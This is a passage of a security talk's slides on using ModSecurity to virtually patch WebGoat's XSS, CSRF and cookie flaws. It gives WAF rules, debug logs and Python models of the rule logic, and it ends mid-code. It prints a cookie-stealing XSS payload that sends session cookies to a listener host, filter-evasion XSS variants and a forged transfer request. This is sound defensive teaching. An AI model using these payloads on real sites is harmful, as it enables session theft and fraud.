Speaker Background

Director of Application Security Research at Breach Security

- Lead Breach Security Labs
- Develop ModSecurity Rules

ModSecurity Community Manager

- The go-between for development and the user community

Background as an IDS/Web Security Admin

- Operational web security for government clients

Author

- Preventing Web Attacks with Apache (Addison-Wesley, 2006)
Community Projects

Open Web Application Security Project (OWASP)

- Speaker/Instructor
- Project Leader, ModSecurity Core Rule Set

Web Application Security Consortium (WASC)

- Board Member
- Project Leader, Distributed Open Proxy Honeypots

The SANS Institute

- Courseware Developer/Instructor

Center for Internet Security (CIS)

- Apache Benchmark Project Leader
Virtual Patching Introduction

- What is it?
- Source Code/Patching Challenges
- Value

OWASP SoC Project

- Securing WebGoat with ModSecurity

Project Solution Examples

- Cross-Site Scripting
  • Negative Security
  • Positive Security
  • AppDefect Identification
  • HTTPOnly Cookies
- Cross-Site Request Forgery
  • Unique Token Implementation via Content-Injection
- Session Management Flaws
  • Session Hijacking/Fixation
  • Deny Invalid Sessions
- Hidden Parameter Tampering
  • The Need for Lua

Conclusion/Questions
VIRTUAL PATCHING: WHAT IS IT?

What is Virtual Patching?

A Web Application Firewall analyzes traffic and enforces the Virtual Patching Logic so that malicious traffic never reaches the web application.

[Diagram: a Web Application Firewall placed between the Network Security layer and the Web Application Environment (Extranet, ECommerce, Intranet)]

A Virtual Patch is a REACTIVE, REMEDIATION tactical response that relies upon some other process (code review, scanning or pentest) to identify the problem.
Why Not Just Fix the Code?

[Chart: degree of access to the application (Little, Partial, Full access to source and developers) against how the application is treated (application as black box versus mostly developed in-house)]

If you have full code access, fix it in the code.

If you don't have code access or if code updates/patches will break functionality, then virtual patching may be your only option.

Image - OWASP Best Practices: Use of Web Application Firewalls
Vulnerability Scanning Statistics

Time-to-Fix

Average number of days for the top 5 URGENT severity vulnerabilities to be fixed [1]:

- SQL Injection
- Insufficient Authorization
- HTTP Response Splitting
- Directory Traversal
- Insufficient Authentication

[Bar chart: days to fix for each of the five vulnerability classes]

Identification of the vulnerability was not the problem.
Exploit Code Availability Average - 6 days [2]
Traditional code fixes take too long...

1 - Whitehat Website Security Statistics Report, March 2008
2 - Symantec Internet Security Threat Report, H3, 2007
Why Not Just Fix the Code?

Business Considerations

[Chart: analysis of Vulnerability x Impact x Cost to Fix]

Black Hat Briefings
Why Not Just Fix the Code?

Emergent Behavior Phenomenon

Some vulnerabilities only manifest themselves in production when inter-connected systems share data.

These are Architectural Flaws that exhibit Emergent Behaviors:

"Two pieces of code put together, one with a limited spec for strong data typing, and the other with weak handling of output, result in a new set of behaviors that fail to meet specification, though each unit of code individually meets its own specification."

- Arian Evans (WebSecurity Mail-list Post)

May not be identifiable or correctable within the application's code.
Risk Analysis

[Diagram: Architectural Risk Analysis (Threats, Vulnerabilities) feeding Implementation & Operations and Risk Management and Measurement]

Code Reviews + Scanning + WAF

[Diagram: Operations cycle - automated/manual scanning and pentesting, Virtual Patching, and reporting application defects back to development]
Organizational Value

Business Value

• Allows organizations to maintain normal patching cycles.
• Reduced or eliminated time and money spent performing emergency patching.

Risk Value

• Reduces risk until a vendor-supplied patch is released or while a patch is being tested and applied.
• Protection for mission-critical systems that may not be taken offline.

Technical Value

• Less likelihood of introducing conflicts as libraries and support code files are not changed.
• Scalable solution as it is implemented in few locations vs. installing patches on all hosts.
Security Consultant Value

When it is not possible to edit the application's code (for either business or technical reasons), security consultants are limited in the services they can provide.

- Virtual Patching offers additional options.

How web "multi-lingual" are you?

- PHP, ASP/ASP.NET, Java, Python, Ruby, VB.NET, C#...

- Actual Security Consultant Quote -

"For the purpose of patching painfully old systems, that should really have been taken out and shot but are kept running for 'business-reasons', I'd rather learn ModSecurity + e.g. Lua properly than having to learn every thinkable and unthinkable language and platform ever used for throwing together web content."
OWASP SUMMER OF CODE PROJECT: SECURING WEBGOAT WITH MODSECURITY

OWASP - The Open Web Application Security Project

Securing WebGoat Using ModSecurity
Project Team and Objective

Project Team

- Leader: Stephen Evans (Security Consultant)
- 1st reviewer: Ivan Ristic & Ryan Barnett (Breach Security Labs)
- 2nd reviewer: Christian Folini (ModSecurity Power User)

Objective

"To create custom ModSecurity rulesets that, in addition to the Core Set, will protect WebGoat 5.2 Standard Release from as many of its vulnerabilities as possible (the goal is 90%) without changing one line of source code."
Project Goals



Demonstrate cutting-edge WAF capabilities 

- Wow, I didn't know (a WAF|ModSecurity) could do that?! 

Tactical use-cases for virtual patching vulnerability 
remediation 

- Anyone can download WebGoat and ModSecurity and run 
their own tests. 

Virtual Patching Options 

- Block attacks to exploit the vulnerability. 

- Address the specific, underlying WebGoat vulnerability. 

- If possible, address the underlying vulnerability generically 
so that the virtual patch could be applied to other 
applications that suffer from the same issue. 

- Alert on identified Application Defects. 
WebGoat Overview

[Screenshot: the "How to work with WebGoat" lesson in Mozilla Firefox. The lesson menu lists: Introduction, General, Access Control Flaws, AJAX Security, Authentication Flaws, Buffer Overflows, Code Quality, Concurrency, Cross-Site Scripting (XSS), Denial of Service, Improper Error Handling, Injection Flaws, Insecure Communication, Insecure Configuration, Insecure Storage, Parameter Tampering (including Exploit Unchecked Email), Session Management Flaws, Web Services, Admin Functions, Challenge.]

How To Work With WebGoat

Welcome to a short introduction to WebGoat. Here you will learn how to use WebGoat and additional tools for the lessons.

Environment Information

WebGoat uses Apache Tomcat as server. It is setup to run on localhost. This configuration is for single user. If you want to use WebGoat in a laboratory or in class you might need to change the setup. Please refer to the Tomcat Configuration in the Introduction section.
Why ModSecurity?

Open Source, Free

Can be deployed embedded or on a reverse proxy

Deep understanding of HTTP and HTML

Robust Parsing

Anti Evasion Features

Supports Complex Rules Logic

Advanced Capabilities

- Persistent Collections
- Content Injection and Lua API

[Diagram: Proxy Mode (ModSecurity on a reverse proxy in front of the web servers) versus Embedded Mode (ModSecurity loaded inside the web server)]

www.modsecurity.org
ModSecurity Rules Language

It's a simple event-based programming language.

- Five processing phases, one for each major processing step.
- Look at any part of the transaction.
- Transform data to counter evasion.
- Combine rules to form complex logic.

Common tasks are easy (the Core Rule Set), complex tasks are possible (Virtual Patching).
Example Rule Syntax

SecRule TARGETS OPERATOR [ACTIONS]

- TARGETS tells ModSecurity where to look
- OPERATOR tells ModSecurity how to process data
- ACTIONS tells ModSecurity what to do if a rule matches
Tools

Testing Tools

In order to accurately test out the virtual patch, it may be necessary to use other tools -

- cURL - Command line web client
- Burp Proxy - Local Proxy
- Expresso - RegEx GUI Tool

These tools will aid in both the construction and testing of virtual patching rules.

[Screenshot: Burp Proxy intercept window showing an intercepted HTTP response: 200 OK, Date: Wed, 03 Aug 2005 11:15:05 GMT, Server: Apache, Expires: Wed, 1 Jan 1997 00:00:00 GMT, No-Cache, a cookie with secure=yes, Connection: close, and <title>LloydsTSB online - Welcome</title>]
ModSecurity AuditViewer

[Screenshot: ModSecurity AuditViewer, Thu Feb 05 08:45:49 EST 2009, Webserver: 192.168.1.105, Port: 80, with "adjust Content-Length" and "use SSL" checkboxes and an "Inject" button. The selected audit log entry shows the following request and response.]

POST /WebGoat/attack?Screen=301&menu=1600 HTTP/1.1
Host: www.webgoat.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.webgoat.net/WebGoat/attack?Screen=801&menu=1600
Cookie: JSESSIONID=D798FE268D317B360020B9D797EFF2A1
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
Content-Type: application/x-www-form-urlencoded

HTTP/1.1 200 OK
Date: Thu, 05 Feb 2009 13:52:06 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 31115
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
SOLUTION EXAMPLE: CROSS-SITE SCRIPTING (XSS)

Cross-Site Scripting (XSS)

Application Defect(s)

- Insufficient input validation
- Application does not properly output encode user supplied data (meta-characters)

Vulnerability:

- Attacker can send JavaScript to the web application and have the code execute within the victim's browser

Technique:

- If attackers are able to insert XSS code, they may be able to steal SessionID credentials or do other harm

Consequence:

- Session Hijacking, Malware Installs, Fraud (CSRF)
Cross-Site Scripting (XSS)

Reflected XSS

- Attacker tricks the victim into sending the malicious payload themselves (e.g. Phishing email).
- Malicious JavaScript is sent/echoed back in the same transaction
Reflected XSS Lesson

[Screenshot: the WebGoat "Reflected XSS Attacks" lesson in Mozilla Firefox at http://www.webgoat.net/WebGoat/attack?Screen=389&menu=900, with FoxyProxy routing through Burp. The lesson text reads, in part: "For this exercise, your mission is to come up with some input containing a script. You have to try to get this ... execute the script and do ..." A JavaScript alert dialog ("The page at http://www.webgoat.net says:") is shown on top of the lesson.]
Reflected XSS - Mitigations

Input Validation

- Negative Security - Blacklist known XSS using the Core Rule Set Regular Expressions
- Positive Security - Enforce expected input for "field1" parameter data

Application Defect Identification/Remediation

- Identify if application does not properly output encode user supplied data
- HTTPOnly flag missing from SessionIDs

Reflected XSS Mitigations

Input Validation

Negative security model: allow all, deny what's wrong

• Blacklist known XSS payloads using the ModSecurity Core Rule Set Regular Expressions

Positive security model: deny all, allow what's right

• Enforce expected input for "field1" parameter data
Core Rules - Negative Security

Generic XSS Detection

SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES "(?:\b(?:(?:type\b\W*?\b(?:text\b\W*?\b(?:j(?:ava)?|ecma|vb)|application\b\W*?\bx-(?:java|vb))script|c(?:opyparentfolder|reatetextrange)|get(?:special|parent)folder|iframe\b.{0,100}?\bsrc)\b|on(?:(?:mo(?:use(?:o(?:ver|ut)|down|move|up)|ve)|key(?:press|down|up)|c(?:hange|lick)|s(?:elec|ubmi)t|(?:un)?load|dragdrop|resize|focus|blur)\b\W*?=|abort\b)|(?:l(?:owsrc\b\W*?\b(?:(?:... \
    "phase:2,pass,capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,log,auditlog,msg:'Cross-site Scripting (XSS) Attack',id:'950004',tag:'WEB_ATTACK/XSS',logdata:'%{TX.0}',severity:'2'"

(The regular expression is truncated on the slide.)
Updated Core Rules

Targeted XSS for WebGoat

<Location /WebGoat/attack>
SecRule ARGS:field1 "(?:\b(?:(?:type\b\W*?\b(?:text\b\W*?\b(?:j(?:ava)?|ecma|vb)|application\b\W*?\bx-(?:java|vb))script|c(?:opyparentfolder|reatetextrange)|get(?:special|parent)folder|iframe\b.{0,100}?\bsrc)\b|on(?:(?:mo(?:use(?:o(?:ver|ut)|down|move|up)|ve)|key(?:press|down|up)|c(?:hange|lick)|s(?:elec|ubmi)t|(?:un)?load|dragdrop|resize|focus|blur)\b\W*?=|abort\b)|(?:l(?:owsrc\b\W*?\b(?:(?:... \
    "phase:2,deny,capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,log,auditlog,msg:'Cross-site Scripting (XSS) Attack',id:'1',tag:'WEB_ATTACK/XSS',logdata:'%{TX.0}',severity:'2'"
</Location>

(Same regular expression as the generic Core Rule, scoped to the field1 argument of /WebGoat/attack and switched from pass to deny; truncated on the slide.)
Why Negative Security Fails

Evasions

Canonicalization/Obfuscation Problems

- Unicode, HTML Encoding/Decoding
- Too many variations that result in functionally equivalent code

Original form

<script>alert('XSS')</script>

Using ActionScript inside Flash

a="get"; b="URL(\""; c="javascript:"; d="alert('XSS');\")"; eval(a+b+c+d);

DIV Background Image

<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028 ... (the remainder of the payload is cut off on the slide)
Reflected XSS

Positive Security Model

<Location /WebGoat/attack>
SecRule &ARGS_GET_NAMES:field1 "@ge 1" "phase:2,t:none,log,deny,msg:'Field1 Parameter Found in Query_String.'"

SecRule &ARGS_POST_NAMES:field1 "@eq 0" "phase:2,t:none,log,deny,msg:'Field1 Parameter is Missing from Post Payload.'"

SecRule &ARGS_POST_NAMES:field1 "@gt 1" "phase:2,t:none,log,deny,msg:'Multiple Field1 Parameters Found in Post Payload.'"

SecRule ARGS_POST:field1 "!^\d{3}$" "phase:2,t:none,log,deny,msg:'Field1 Data.'"
</Location>

(The last rule only allows digits: a three-digit code is the expected input.)
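As an added example that is not part of the slides or the project's rule set, the following Python model applies the same four positive-security checks to a transaction's query string and POST body, so the rule logic (including the duplicate-parameter case) can be exercised offline. The function name and the "Invalid Field1 Data." message are this example's own; the other messages are the slide's.

```python
import re
from urllib.parse import parse_qsl

# Constructed example, not code from the slides or from ModSecurity: a Python
# model of the positive-security rules for the "field1" parameter.
FIELD = "field1"
FIELD_RE = re.compile(r"\d{3}")  # the lesson expects a three-digit code


def check_field1(query_string, post_body):
    """Apply the four checks in rule order and return (allowed, message)."""
    get_args = parse_qsl(query_string, keep_blank_values=True)
    post_args = parse_qsl(post_body, keep_blank_values=True)

    # &ARGS_GET_NAMES:field1 "@ge 1": the parameter may not travel in the query string
    if any(name == FIELD for name, _ in get_args):
        return False, "Field1 Parameter Found in Query_String."

    post_values = [value for name, value in post_args if name == FIELD]
    # &ARGS_POST_NAMES:field1 "@eq 0": it must be present in the POST body
    if len(post_values) == 0:
        return False, "Field1 Parameter is Missing from Post Payload."
    # &ARGS_POST_NAMES:field1 "@gt 1": exactly once (blocks parameter pollution)
    if len(post_values) > 1:
        return False, "Multiple Field1 Parameters Found in Post Payload."
    # ARGS_POST:field1 "!^\d{3}$": only three digits. fullmatch is stricter than
    # PCRE's $, which would also accept "123\n".
    if FIELD_RE.fullmatch(post_values[0]) is None:
        return False, "Invalid Field1 Data."  # wording is this example's own
    return True, "ok"
```

The order matters: counting occurrences before validating the value means a request carrying one good and one bad field1 is refused outright instead of depending on which copy the application happens to read.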
Reflected XSS

Application Defect

Failure to HTML Output Encode User Supplied Data

Request:  <IMG SRC="javascript:alert('XSS');">
Response: <IMG SRC="javascript:alert('XSS');">

Correct HTML Output Encoding of User Supplied Data

Request:  <IMG SRC="javascript:alert('XSS');">
Response: <IMG SRC="javascript:alert('XSS'&#41;;">
Reflected XSS

ModSecurity Audit Log Entry

--1e58114a-A--
[05/Feb/2009:01:42:16 --0500] SYqKSH8AAQEAABUEAsgAAAAA 192.168.110.1 4134 192.168.110.133 80
--1e58114a-B--
POST /WebGoat/attack?Screen=49&menu=900 HTTP/1.1
--CUT--
--1e58114a-C--
QTY1=1&QTY2=1&QTY3=1&QTY4=1&field2=4128+3214+0002+1999&field1=<script>alert(document.cookie)</script>&SUBMIT=Purchase
--1e58114a-E--
--CUT--
<div id="message" class="info"><BR> * Congratulations. You have successfully completed this lesson. <BR> * Whoops! You entered <script>alert(document.cookie)</script> instead of your three digit code. Please try again. </div>
App Defect Rule Set

Dynamic Taint Propagation [1]

Follow untrusted data and identify points where they are misused

Use ModSecurity's built-in Transactional Collection (TX)

- Use the "setvar:tx" action

Inspect Request Parameter Payloads

- Monitor inbound payloads for meta-characters that could be used in an XSS attack
- Set a TX variable that holds this data

Inspect Current Response Body Payload

- Check outbound response data for the exact same user-supplied data

1 - Fortify - B. Chess/J. West
Reflected XSS

App Defect Rule

SecRule ARGS "([\'\"\(\)\;<>#])" "chain,phase:4,t:none,log,auditlog,deny,status:403,id:'1',msg:'Potentially Malicious Meta-characters in User Data Not Properly Output Encoded.',logdata:'%{tx.inbound_meta-characters}'"
    SecRule MATCHED_VAR "^.{15,}$" "chain,t:none,setvar:tx.inbound_meta-characters=%{matched_var}"
        SecRule RESPONSE_BODY "@contains %{tx.inbound_meta-characters}" "ctl:auditLogParts=+E"
Rule and Debug Log Data (1)

SecRule ARGS "([\'\"\(\)\;<>#])" "chain,phase:4,t:none,log,auditlog,deny,status:403,id:'1',msg:'Potentially Malicious Meta-characters in User Data Not Properly Output Encoded.',logdata:'%{tx.inbound_meta-characters}'"

[5] Rule 81c0640: SecRule "ARGS" "@rx ([\\'\"\\(\\)\\;<>#])" "phase:2,log,auditlog,pass,chain,t:none,setvar:tx.inbound_meta-characters=%{matched_var}"
[4] Executing operator "rx" with param "([\\'\"\\(\\)\\;<>#])" against ARGS:field1.
[9] Target value: "<script>alert(document.cookie)</script>"
[9] Added regex subexpression to TX.0: <
[9] Added regex subexpression to TX.1: <
[4] Operator completed in 28 usec.
Rule and Debug Log Data (2)

SecRule MATCHED_VAR "^.{15,}$" "chain,t:none,setvar:tx.inbound_meta-characters=%{matched_var}"

[5] Rule 81d6a30: SecRule "MATCHED_VAR" "@rx ^.{15,}$" "phase:2,log,auditlog,pass,chain,t:none,setvar:tx.inbound_meta-characters=%{matched_var}"
[4] Transformation completed in 2 usec.
[4] Executing operator "rx" with param "^.{15,}$" against MATCHED_VAR.
[9] Target value: "<script>alert(document.cookie)</script>"
[4] Operator completed in 3 usec.
[9] Setting variable: tx.inbound_meta-characters=%{matched_var}
[9] Resolved macro %{matched_var} to "<script>alert(document.cookie)</script>"
[9] Set variable "tx.inbound_meta-characters" to "<script>alert(document.cookie)</script>".
[4] Rule returned 1.
Rule and Debug Log Data (3)

SecRule RESPONSE_BODY "@contains %{tx.inbound_meta-characters}" "ctl:auditLogParts=+E"

[4] Executing operator "contains" with param "%{tx.inbound_meta-characters}" against RESPONSE_BODY.
[9] Target value: "\r\n\r\n\r\n<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
--CUT--
[9] Resolved macro %{tx.inbound_meta-characters} to "<script>alert(document.cookie)</script>"
[4] Ctl: Set auditLogParts to ABIFHZE.
[2] Warning. String match "<script>alert(document.cookie)</script>" at RESPONSE_BODY. [file "/usr/local/apache/conf/core-rules_1.6.2/modsecurity_crs_15_customrules.conf"] [line "17"] [id "1"] [msg "Potentially Malicious Meta-Characters in User Data Not Properly Output Encoded."] [data "<script>alert(document.cookie)</script>"]
Cross-Site Scripting (XSS)

Stored XSS

• Attacker is the one who sends the malicious payload to the application.
• Victim views the malicious payload at another time.
• Malicious JavaScript is sent/echoed back in different transactions
• Negative/Positive Security rules presented for Reflected XSS still work to block the inbound attack
Stored XSS Lesson - Stealing

[Screenshot: the WebGoat "Stored XSS Attacks" lesson. The Cross-Site Scripting lesson menu lists: Phishing with XSS; LAB: Cross Site Scripting (Stage 1: Stored XSS, Stage 2: Block Stored XSS using Input Validation, Stage 3: Stored XSS Revisited, Stage 4: Block Stored XSS using Output Encoding, Stage 5: Reflected XSS, Stage 6: Block Reflected XSS); Stored XSS Attacks; Cross Site Request Forgery; Reflected XSS Attacks; HTTPOnly Test; Cross Site Tracing (XST) Attacks. The message form is being submitted with this payload in the Message field:]

<script>
var img = new Image();
img.src="http://192.168.1.104:3888/Testing/CookiesAdd.aspx?Ck=" + document.cookie;
</script>

[Alongside, a Cygwin terminal (/cygdrive/c/Documents and Settings/rbarnett/My Documents) shows the listener on 192.168.1.104:3888 receiving the resulting GET /Testing/... request from the victim's browser, carrying JSESSIONID=1034CF824DE6008F47DE64D06B25AD1F in the query string.]
App Defect Rule Set

Stored XSS

Use ModSecurity's Global Persistent Collection (GLOBAL)

- Use the "initcol:global=" and "setvar:global." actions

Leverage the Reflected XSS Rules

- Set a variable in the GLOBAL collection that holds this data across transactions

Inspect ALL Response Body Payloads

- Check outbound response data for the exact same user-supplied data
Stored XSS

App Defect Rule

SecAction "phase:1,nolog,pass,initcol:global=xss_list"

...Reflected XSS Rules Here...

SecRule GLOBAL:'/XSS_LIST_.*/' "@streq %{tx.inbound_meta-characters}" "phase:4,t:none,nolog,pass,skip:1"

SecRule TX:INBOUND_META-CHARACTERS ".*" "phase:4,t:none,nolog,pass,setvar:global.xss_list_%{time_epoch}=%{matched_var}"

SecRule GLOBAL:'/XSS_LIST_.*/' "@within %{response_body}" "phase:4,t:none,log,auditlog,pass,msg:'Potentially Malicious Meta-Characters in User Data Not Properly Output Encoded',tag:'WEB_ATTACK/XSS'"
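The following Python model is an added example, not code from the slides or from ModSecurity, covering both the reflected app-defect rule (the TX variable checked against the current response) and the stored-XSS rule set above (the GLOBAL xss_list collection checked against every later response). The meta-character class and the 15-character minimum are the slide's; the names XssList and process_transaction, and the sample transactions in the usage note, are this example's own.

```python
import re
from urllib.parse import parse_qsl

# Constructed example, not code from the slides or from ModSecurity: a Python
# model of the reflected (TX) and stored (GLOBAL xss_list) taint-propagation
# rules. XssList and process_transaction are this example's own names.
META_RE = re.compile(r"([\'\"\(\)\;<>#])")  # meta-character class from the rule
MIN_LEN = 15                                 # the MATCHED_VAR "^.{15,}$" filter


def inbound_meta_characters(post_body):
    """Inbound part of the chain: the first argument value that contains an XSS
    meta-character and is at least MIN_LEN long becomes tx.inbound_meta-characters."""
    for _name, value in parse_qsl(post_body, keep_blank_values=True):
        if META_RE.search(value) and len(value) >= MIN_LEN:
            return value
    return None


def check_reflected(post_body, response_body):
    """Reflected-XSS defect: the tainted input is echoed verbatim in the same
    transaction (the @contains check on RESPONSE_BODY). Returns the payload or None."""
    tainted = inbound_meta_characters(post_body)
    if tainted is not None and tainted in response_body:
        return tainted
    return None


class XssList:
    """Model of the GLOBAL xss_list collection: payloads seen in earlier
    transactions, each with the time it was stored, expiring after timeout."""

    def __init__(self, timeout=3600):
        self.timeout = timeout
        self.entries = []  # (payload, stored_at_epoch)

    def remember(self, payload, now):
        """setvar:global.xss_list_%{time_epoch}, guarded by the @streq skip so an
        identical payload is not stored twice. Returns True if stored."""
        if any(stored == payload for stored, _ in self.entries):
            return False
        self.entries.append((payload, now))
        return True

    def check_stored(self, response_body, now):
        """Stored-XSS defect: any remembered, unexpired payload appears verbatim in
        this response (the @within %{response_body} rule)."""
        self.entries = [(p, t) for p, t in self.entries if now - t < self.timeout]
        return [p for p, _ in self.entries if p in response_body]


def process_transaction(xss_list, post_body, response_body, now):
    """Run both phase-4 checks for one transaction in the order the rule set does:
    reflected check, remember the inbound payload, then the stored check."""
    reflected = check_reflected(post_body, response_body)
    tainted = inbound_meta_characters(post_body)
    if tainted is not None:
        xss_list.remember(tainted, now)
    stored = xss_list.check_stored(response_body, now)
    return reflected, stored
```

Feeding it the lesson's flow shows why the check is an application-defect detector rather than an attack detector: a response that renders the stored message as &lt;script&gt;... is never flagged, because the @within/@contains match is an exact substring test on the unencoded input. The same property is the check's limit: an application that encodes only some characters produces a different string and is also not flagged.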
Viewing Persistent Collections

# java -cp /root/org.jwall.tools.jar org.jwall.tools.CollectionViewer /tmp/
Collection global, last read @ Thu Feb 05 02:01:18 EST 2009
Created at Thu Feb 05 01:42:16 EST 2009
global[xss_list].xss_list_1233816136 = <script>alert(document.cookie)</script>
global[xss_list].xss_list_1233817131 = <SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
global[xss_list].xss_list_1233817276 = <META HTTP-EQUIV="refresh" CONTENT="0;URL=http://;URL=javascript:alert('XSS');">
global[xss_list].xss_list_1233817198 = <BASE HREF="javascript:alert('XSS');//">
global[xss_list].TIMEOUT = 3600
This collection expires in 59m 57.242s

Collection Viewer - www.jwall.org
Application Defect Mitigation

Missing Cookie Protections - HTTPOnly Flag

Defect:

- Application does not use the HttpOnly Cookie Option

Vulnerability:

- The HttpOnly cookie flag option helps to prevent client-side code from accessing the cookie data within the browser

Technique:

- If attackers are able to insert XSS code, they may be able to steal SessionID credentials

Consequence:

- Session Hijacking
Missing HTTPOnly Flag

[Screenshot: Burp Suite v1.1 showing a WebGoat response whose Set-Cookie header carries no HttpOnly flag]
Missing HTTPOnly Rule Set

ModSecurity + Apache

Use ModSecurity to Inspect Outbound Set-Cookie Data

- Check for SessionIDs that are missing the HTTPOnly flag

Use ModSecurity's "setenv" action

- ENV data holds the initial Set-Cookie data

Apache can access/update this data using the Header directive

- Issue a new Set-Cookie header that appends HTTPOnly to the end

Missing HTTPOnly Flag

App Defect Rule

SecRule RESPONSE_HEADERS:/Set-Cookie2?/ "!(?i:\;? ?httponly;?)" "chain,phase:3,t:none,pass,nolog"
    SecRule MATCHED_VAR "(?i:(j?sessionid|(php)?sessid|(asp|jserv|jw)?session[-_]?(id)?|cf(id|token)|sid))" "t:none,setenv:http_cookie=%{matched_var}"

Header set Set-Cookie "%{http_cookie}e; HTTPOnly" env=http_cookie
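As an added example that is not code from the slides, ModSecurity or Apache, the following Python reproduces the decision the two chained rules make on each outbound Set-Cookie value and the rewrite the Header directive performs. The two regular expressions are copied from the rule above; the function names and the sample headers in the test are this example's own.

```python
import re

# Constructed example, not code from the slides or from ModSecurity/Apache: a
# Python model of the HTTPOnly rule chain and the Header directive.
HTTPONLY_RE = re.compile(r"(?i:\;? ?httponly;?)")
SESSION_RE = re.compile(
    r"(?i:(j?sessionid|(php)?sessid|(asp|jserv|jw)?session[-_]?(id)?|cf(id|token)|sid))")


def needs_httponly(set_cookie_value):
    """True when the chain would fire: no HttpOnly attribute (first rule, negated
    operator) and the cookie looks like a session identifier (second rule, run
    against MATCHED_VAR, i.e. the same Set-Cookie value)."""
    if HTTPONLY_RE.search(set_cookie_value):
        return False
    return SESSION_RE.search(set_cookie_value) is not None


def add_httponly(set_cookie_value):
    """What 'Header set Set-Cookie "%{http_cookie}e; HTTPOnly"' produces."""
    return set_cookie_value.rstrip("; ") + "; HTTPOnly"


def fix_response_headers(headers):
    """headers: list of (name, value) as sent by the application. Returns a new
    list in which every session cookie lacking HttpOnly has it appended; all
    other headers pass through unchanged."""
    fixed = []
    for name, value in headers:
        if name.lower() in ("set-cookie", "set-cookie2") and needs_httponly(value):
            fixed.append((name, add_httponly(value)))
        else:
            fixed.append((name, value))
    return fixed
```

Two things the model makes visible. First, the session-name regex is deliberately loose (for instance "sid" matches inside any cookie text containing it), which errs toward adding the flag to cookies that may not need it; that is harmless. Second, the model rewrites each Set-Cookie header on its own, whereas the Apache "Header set" directive replaces every Set-Cookie header with the single value held in the environment variable, so a response that sets more than one cookie would lose the others; a deployment that sets several cookies needs a per-cookie approach.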
HTTPOnly Flag Added

[Screenshot: the WebGoat "LAB: Cross Site Scripting" lesson in Mozilla Firefox at http://www.webgoat.net/WebGoat/attack?Screen=349&menu=900 (Goat Hills Financial, Human Resources, Search For User, Employee larry), FoxyProxy disabled]
SOLUTION EXAMPLE: CROSS-SITE REQUEST FORGERY (CSRF)

Cross Site Request Forgery (CSRF)

Defect:

- Application uses Implicit Authentication based on SessionID Cookie data
- Also known as Session Riding, One-Click Attacks, etc...

Vulnerability:

- Web browsers automatically send SessionID data with requests

Technique:

- An attack that tricks the victim into loading a page that contains a malicious request.
- In a forum, the attack may direct the user to invoke a logout function
- Can be combined with XSS

Consequence:

- Fraud
WebGoat CSRF Lesson

[Screenshot: Burp Suite v1.1 proxy intercept (intercept is on) of a request to http://www.webgoat.net:80 [192.168.1.105], with the WebGoat CSRF lesson open in Firefox behind it:]

GET /WebGoat/attack?Screen=417&menu=900&transferFunds=5000 HTTP/1.1
Host: www.webgoat.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://localhost:8080/WebGoat/attack?Screen=417&menu=900&Num=38
CSRF Mitigation

Adding Unique Tokens via Content Injection

Use ModSecurity's Session Persistent Collection

- Data is saved for each Session ID

Create/Inject Unique Token Value into Response Data

- Use "t:sha1" action to capture hash of JSESSIONID
- Use "append" Content Injection action
- Uses csrf.js script from OWASP CSRFGuard

Validate CSRF Token Data on Subsequent Requests

- Check that CSRF Token exists and data matches the saved CSRF Hash data
CSRF Rules (1)

Storing/Injecting Unique Tokens

SecContentInjection On

SecRule RESPONSE_HEADERS:/Set-Cookie2?/ "(?i:jsessionid=([a-f0-9]+)\;\s?)" "chain,phase:3,t:none,pass,nolog,capture,setsid:%{TX.1},setvar:session.sessionid=%{TX.1}"
    SecRule SESSION:SESSIONID "(.*)" "t:none,capture,t:sha1,t:hexEncode,setvar:session.csrf_token=%{TX.1}"

SecRule REQUEST_FILENAME "/WebGoat/attack" "phase:4,t:none,nolog,pass,append:'<script language=\"JavaScript\"> \
var tokenName = \'MODSEC_CSRF_TOKEN\'; \
var tokenValue = \'%{session.csrf_token}\'; \
--CUT-- \
</script>'"
CSRF Rules (2)

Validating Tokens

# Any request that carries parameters must carry exactly one token ...
SecRule &ARGS "@ge 1" "chain,phase:2,t:none,deny,log,ctl:auditLogParts=+E,msg:'CSRF Attack Detected - Missing CSRF Token.'"
  SecRule &ARGS:MODSEC_CSRF_TOKEN "!@eq 1"

# ... and that token must equal the one stored for the session.
SecRule &ARGS "@ge 1" "chain,phase:2,t:none,deny,log,msg:'CSRF Attack Detected - Invalid Token.'"
  SecRule ARGS:MODSEC_CSRF_TOKEN "!@streq %{SESSION.CSRF_TOKEN}"
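Putting the CSRF Mitigation flow and the two rule slides together, here is an added Python model of the same logic (example code written for this page, not ModSecurity rule syntax and not from the original deck). The sessions dict stands in for the SESSION persistent collection; learn_session, inject_token and check_request are names chosen here; the session id and requests used to exercise it are taken from the deck's screenshots. The Set-Cookie regex, the token derivation (SHA-1 of the JSESSIONID, hex-encoded), the appended script and the two deny conditions follow the slides.

```python
import hashlib
import re
from urllib.parse import parse_qs

# Same Set-Cookie pattern as the SecRule on the slide: case-insensitive hex JSESSIONID.
JSESSIONID_RE = re.compile(r"(?i)jsessionid=([a-f0-9]+);\s?")
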